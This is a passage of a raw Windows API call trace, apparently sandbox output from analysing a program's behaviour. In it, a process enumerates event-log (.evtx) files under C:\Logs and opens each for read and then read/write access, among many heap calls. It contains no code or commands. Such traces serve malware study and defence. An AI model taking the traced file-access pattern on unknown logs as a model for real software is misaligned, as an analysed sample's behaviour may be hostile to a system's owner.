lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0086.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x45e18 [0086.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x45e18, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 51 [0086.969] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50be4414, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50be4414, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e18 | out: hHeap=0x20000) returned 1 [0086.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0086.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0086.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0086.969] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.969] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.969] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50be4414, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50be4414, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", cAlternateFileName="MI36C5~1.EVT")) returned 1 [0086.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0086.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0086.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0086.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69440 [0086.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0086.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46668 [0086.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69440 | out: hHeap=0x20000) returned 1 [0086.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0086.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0086.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0086.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0086.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0086.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46668 | out: hHeap=0x20000) returned 1 [0086.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0086.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0086.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0086.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0086.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0086.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0086.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0086.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0086.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0086.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0086.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0086.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0086.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0086.970] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.970] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.970] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.970] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0086.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0086.970] AreFileApisANSI () returned 1 [0086.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx", lpUsedDefaultChar=0x0) returned 56 [0086.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0086.970] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.970] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0086.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0086.970] AreFileApisANSI () returned 1 [0086.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0086.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0086.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x76098, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 56 [0086.971] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.971] GetFileType (hFile=0x424) returned 0x1 [0086.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0086.971] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.971] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.971] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.971] CloseHandle (hObject=0x424) returned 1 [0086.972] AreFileApisANSI () returned 1 [0086.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0086.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0086.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x76098, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 56 [0086.972] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.972] GetFileType (hFile=0x424) returned 0x1 [0086.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0086.972] CloseHandle (hObject=0x424) returned 1 [0086.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0086.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0086.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0086.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0086.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0086.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0086.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0086.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0086.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0086.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0086.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0086.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0086.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0086.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0086.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0086.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71890 [0086.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0086.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0086.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71890 | out: hHeap=0x20000) returned 1 [0086.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0086.973] AreFileApisANSI () returned 1 [0086.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0086.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0086.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x75fa8, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 56 [0086.973] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50be4414, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50be4414, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0086.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0086.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0086.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0086.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.973] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59547c37, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x59547c37, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Known Folders API Service.evtx", cAlternateFileName="MI86D6~1.EVT")) returned 1 [0086.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0086.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0086.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0086.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0086.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0086.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45fd8 [0086.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0086.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0086.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0086.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0086.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0086.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0086.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0086.974] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0086.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0086.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.974] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0086.974] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0086.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.974] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0086.974] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0086.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0086.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0086.974] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.974] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0086.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0086.974] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0086.974] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.974] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.974] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.974] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.974] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0086.974] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0086.974] AreFileApisANSI () returned 1 [0086.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx", lpUsedDefaultChar=0x0) returned 57 [0086.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0086.974] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.974] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0086.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0086.975] AreFileApisANSI () returned 1 [0086.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0086.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0086.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 57 [0086.975] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.975] GetFileType (hFile=0x424) returned 0x1 [0086.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0086.975] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.975] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.975] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.975] CloseHandle (hObject=0x424) returned 1 [0086.976] AreFileApisANSI () returned 1 [0086.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0086.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0086.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 57 [0086.976] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.976] GetFileType (hFile=0x424) returned 0x1 [0086.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0086.976] CloseHandle (hObject=0x424) returned 1 [0086.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0086.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0086.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0086.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0086.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0086.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0086.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0086.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0086.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0086.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0086.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0086.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0086.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0086.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0086.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0086.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0086.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0086.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0086.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0086.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0086.977] AreFileApisANSI () returned 1 [0086.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0086.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0086.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 57 [0086.977] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59547c37, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x59547c37, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0086.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0086.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0086.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0086.977] InitOnceExecuteOnce (in: 